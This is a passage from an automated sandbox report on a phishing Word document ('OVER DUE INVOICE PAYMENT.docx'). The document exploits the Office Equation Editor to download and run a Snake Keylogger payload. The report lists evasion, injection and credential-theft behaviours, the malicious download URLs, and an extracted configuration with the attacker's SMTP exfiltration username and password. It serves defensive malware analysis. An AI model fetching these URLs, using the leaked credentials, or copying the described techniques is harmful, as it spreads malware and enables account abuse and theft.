Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Roaming\obi23456.scr	Memory allocated: 260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Memory allocated: 2160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Memory allocated: 1E20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Memory allocated: 1C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Memory allocated: 2350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Memory allocated: 340000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Roaming\obi23456.scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Thread delayed: delay time: 600000	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Roaming\obi23456.scr

Window / User API: threadDelayed 9713

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3340	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3396	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3532	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3616	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3616	Thread sleep time: -7800000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3620	Thread sleep count: 9713 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr TID: 3620	Thread sleep count: 98 > 30	Jump to behavior

Source: C:\Users\user\AppData\Roaming\obi23456.scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Users\user\AppData\Roaming\obi23456.scr

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Roaming\obi23456.scr

Code function: 10_2_001CFCB8 LdrInitializeThunk,

10_2_001CFCB8

Enables debug privileges

Source: C:\Users\user\AppData\Roaming\obi23456.scr

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\obi23456.scr

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\obi23456.scr

Memory written: C:\Users\user\AppData\Roaming\obi23456.scr base: 400000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Process created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Roaming\obi23456.scr	Queries volume information: C:\Users\user\AppData\Roaming\obi23456.scr VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Queries volume information: C:\Users\user\AppData\Roaming\obi23456.scr VolumeInformation			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.897811172.00000000024FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\obi23456.scr

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Roaming\obi23456.scr

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.897811172.00000000024FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	unknown	United States	16989	UTMEMUS	false
188.114.97.3	unknown	European Union	13335	CLOUDFLARENETUS	true
193.122.6.168	unknown	United States	31898	ORACLE-BMC-31898US	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
132.226.247.73	unknown	United States	16989	UTMEMUS	false

Contacted Domains

Name	IP	Active
reallyfreegeoip.org	188.114.96.3	true
riell.top	188.114.96.3	true
checkip.dyndns.com	193.122.130.0	true
checkip.dyndns.org	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://riell.top/obb.scr	true	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://riell.top/obb.doc	true	7%, Virustotal, Browse Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for URL or domain

Source: https://riell.top/obb.scr

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp

Avira: detection malicious, Label: EXP/CVE-2018-0798.Gen

Found malware configuration

Source: 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "reservation@artefes.com", "Password": "ArtEfes4765*+", "Host": "mail.artefes.com", "Port": "587"}

Multi AV Scanner detection for domain / URL

Source: riell.top	Virustotal: Detection: 5%	Perma Link
Source: https://riell.top/obb.scr	Virustotal: Detection: 7%	Perma Link
Source: https://riell.top/obb.doc	Virustotal: Detection: 7%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr	Virustotal: Detection: 50%	Perma Link
Source: C:\Users\user\AppData\Roaming\obi23456.scr	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Virustotal: Detection: 50%	Perma Link

Multi AV Scanner detection for submitted file

Source: OVER DUE INVOICE PAYMENT.docx	ReversingLabs: Detection: 34%
Source: OVER DUE INVOICE PAYMENT.docx	Virustotal: Detection: 26%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 188.114.97.3 Port: 443

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\obi23456.scr
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\obi23456.scr			Jump to behavior

Document contains Microsoft Equation 3.0 OLE entries

Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.dr

Stream path '_1781631827/\x1CompObj' : ...................F....Microsoft Equation 3.0....

Office Equation Editor has been started

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49162 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49173 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49168 version: TLS 1.2

Source:

Software Vulnerabilities
